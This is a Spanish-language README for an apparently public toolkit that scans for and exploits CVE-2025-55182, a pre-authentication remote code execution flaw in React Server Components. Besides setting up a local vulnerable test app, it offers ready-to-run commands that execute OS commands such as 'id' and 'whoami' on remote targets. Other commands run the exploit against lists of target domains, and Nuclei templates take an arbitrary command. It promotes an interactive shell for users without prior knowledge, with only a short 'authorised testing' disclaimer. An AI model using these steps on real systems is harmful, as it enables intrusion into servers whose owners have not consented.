
Escáner y kit de herramientas de explotación para CVE-2025-55182, un RCE crítico previo a la autenticación en React Server Components. Incluye detección, shell interactiva, implementación de Docker y análisis técnico educativo.
Un completo kit de herramientas de pruebas de seguridad para CVE-2025-55182, una vulnerabilidad crítica de ejecución remota de código sin autenticación previa en React Server Components.
¿Quieres entender esta vulnerabilidad al 100%?
📖 Lea nuestro Análisis Técnico Completo - Todo lo que necesitas saber:
- Por qué React se ejecuta en el servidor (¡no solo en el navegador!)
- Cómo funciona el ataque con diagramas visuales
- Cada línea del exploit explicada
- Desde conceptos básicos hasta explotación avanzada
- ¡Sin requisitos previos!
Perfecto para: Informes de seguridad, materiales de formación, análisis de amenazas, ¡o solo para aprender!
Esta vulnerabilidad afecta a React Server Components versiones 19.0.0 hasta 19.2.0, impactando a:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackImpacto: Atacantes no autenticados pueden ejecutar código arbitrario de forma remota mediante deserialización insegura de cargas útiles de solicitudes HTTP enviadas a endpoints de Server Function.
👉 Lea el Análisis Técnico Completo - Una guía exhaustiva que cubre:
Perfecto para:
No se requieren conocimientos previos - ¡empieza desde lo básico y construye hasta técnicas avanzadas de explotación!
SOLO PARA FINES EDUCATIVOS Y PRUEBAS DE SEGURIDAD AUTORIZADAS
Esta herramienta está destinada exclusivamente para:
Advertencia: El acceso no autorizado a sistemas informáticos es ilegal. Los usuarios son responsables de cumplir con todas las leyes y regulaciones aplicables. Los autores no asumen ninguna responsabilidad por el mal uso de esta herramienta.
¡Sin dependencias! Script único de bash para pruebas rápidas.
👉 EXPLOIT_SCRIPT.md - Script independiente que:
# Single target
./exploit-cve-2025-55182.sh http://target.com
# Multiple targets
./exploit-cve-2025-55182.sh -f targets.txt
Kit completo con Docker, interfaz web e integración con Nuclei. Continúa leyendo a continuación para la instalación.
| Característica | Descripción |
|---|---|
| 🐳 Soporte Docker | Despliegue con un solo comando usando Docker Compose |
| 🌐 Interfaz Web | Interfaz web fácil de usar para usuarios no técnicos |
| 🔍 Entorno de Pruebas Vulnerable | Levanta una app vulnerable local para pruebas seguras |
| 🎯 Escaneo Remoto | Prueba objetivos externos para detectar vulnerabilidad |
| ⚡ Shell Interactivo | Ejecuta comandos del SO y ve resultados en tiempo real |
| 📊 Múltiples Modos de Escaneo | Solo detección o explotación completa |
| 📝 Informes Detallados | Formatos de salida JSON y texto |
| 🔧 Integración Nuclei | Aprovecha el potente escáner de ProjectDiscovery |
Elige tu método de instalación:
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Start scanner
docker compose up
# Access web interface at http://localhost:3001
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Install Nuclei (macOS)
brew install nuclei
# Make scripts executable
chmod +x scripts/*.sh
📖 Configuración Detallada: Consulta SETUP_GUIDE.md para instrucciones paso a paso
⚡ Referencia Rápida: Consulta QUICKSTART.md para casos de uso comunes
Iniciar Interfaz Web:
docker compose up
# Abrir navegador: http://localhost:3001
Iniciar con App de Prueba Vulnerable:
docker compose --profile with-vulnerable-app up
# Escáner: http://localhost:3001
# App vulnerable: http://localhost:3000
Importante para usuarios Docker: Al escanear desde Docker, usa:
http://host.docker.internal:3000 para escanear apps en tu máquina hosthttp://vulnerable-app:3000 para escanear la app vulnerable contenerizadahttps://example.com para objetivos externoshttp://localhost:3001Crea y prueba contra una app vulnerable local:
# Terminal 1: Start vulnerable app
./scripts/setup-vulnerable-app.sh
# App will run on http://localhost:3000
# Terminal 2: Test it
./scripts/test-local.sh
# Execute custom commands
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Basic scan
./scripts/test-remote.sh https://target.com
# With command execution
./scripts/test-remote.sh https://target.com "id"
# Create targets file
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Scan all targets
./scripts/test-multiple.sh targets.txt
Detección básica de vulnerabilidad:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
Ejecutar comandos personalizados:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
Escanear múltiples objetivos:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v